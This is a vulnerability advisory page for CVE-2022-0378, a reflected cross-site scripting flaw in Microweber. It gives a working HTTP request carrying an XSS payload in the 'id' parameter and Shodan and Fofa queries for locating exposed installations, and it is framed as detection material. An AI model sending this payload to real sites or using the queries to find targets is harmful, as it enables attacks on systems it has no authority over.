🔙 목록으로 돌아가기

CVE-2022-0378: Microweber Cross-Site Scripting

TitleMicroweber Cross-Site Scripting
Authorpikpikcu
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
RemediationApply the latest security patch or upgrade to a version that has addressed the vulnerability.
CVSS Score5.4
EPSS Score0.07396
CVE IDCVE-2022-0378
CWE IDCWE-79
Shodan Queryhttp.favicon.hash:780351152http.html:"microweber"
Fofa Querybody="microweber"icon_hash=780351152
Tags cve2022 cve microweber xss huntr vuln

🔍 Vulnerability Description

Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.

🌐 HTTP Request

GET /module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0378.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-0378.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A